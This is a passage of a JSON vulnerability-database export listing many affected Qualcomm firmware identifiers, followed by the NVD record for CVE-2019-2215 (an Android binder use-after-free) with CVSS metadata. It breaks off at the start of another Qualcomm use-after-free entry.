"cpe:2.3:o:qualcomm:sdr8150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6582_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9341_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8810_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5875_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet5100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3910_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5568_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet5100m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmc1000h_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5671_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8909_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8842_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8096au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6585_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt2000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3615_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8004_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr5975_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8008_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm4125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd765g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5040_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8895_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2550_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9367_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdxr1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qualcomm215_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5677_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5679_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3522_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3516_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6145p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx50m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8801_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8155_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:fsm10056_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3555_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr735b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8916_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8064au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5577_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8031_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350bhs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6390_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6391_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8155au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1394_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe3340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1036aq_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm4125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd662_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs410_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9377_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm7250p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd460_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8996au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4309_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm4250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr545_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd750g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca8337_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8017_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8953_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8150p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm855au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw8574_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5460_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5658_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx50_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc410s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3988_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wgr7640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6584au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8917_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1030_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm6155au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb358s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi632_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd6905g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3660b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8002_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:rgr7640au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmd9655au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6430_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1355_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd730_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd768g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5677_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx24_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pme605_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5515_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr051_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:aqt1000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb231_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:fsm10055_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr2965_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3980_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1357_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6375_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd720g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr735a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4305_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm3302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5522_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm2630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6105_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk7350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8155p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8909w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm439_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa2150p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa2625_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1390_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7250b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4361_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5641_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd429_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr865_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm3301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm215_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs605_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8952_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3680b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5579_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd678_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8803_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs405_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsm7250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2608_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3950_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8815_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2307_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3550_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa515m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csra6640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm6250p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtm527_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3519_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9206_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3999_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8802_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6850_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3991_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5679_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5461_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6320_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9330_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm7350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6851_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5580_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdw3100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1354_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6155_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm429w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5030_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6696_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd450_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd765_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm4290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet4101_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5652_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd888_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1396_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9326_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6436_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9607_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6150p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd205_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd710_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr735g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd835_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd665_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8003_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6426_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd632_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2308_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr6955_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6325_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9626_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8673_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8885g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8953_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8686_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmd9607_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr3925_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm456_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350bh_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr660g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8835_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8151_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1381_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800t_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2580_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6335_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8655g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9385_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1351_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4303_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd455_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9375_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr4905_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1358_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx55m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr735_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3514_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6595au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8820_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs603_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm3003a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr2955_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet4100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6856_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8195au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6740_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw6310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9628_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtm525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm2290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8996au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt1500_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csra6620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5533_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda429w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1398_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2101_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd439_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4641_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr526_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr052_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2305_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt1000_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T15:02:39", "description": "A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-11T19:15:00", "type": "cve", "title": "CVE-2019-2215", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-18T19:15:00", "cpe": ["cpe:/o:google:android:-"], "id": "CVE-2019-2215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:15:01", "description": "Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", 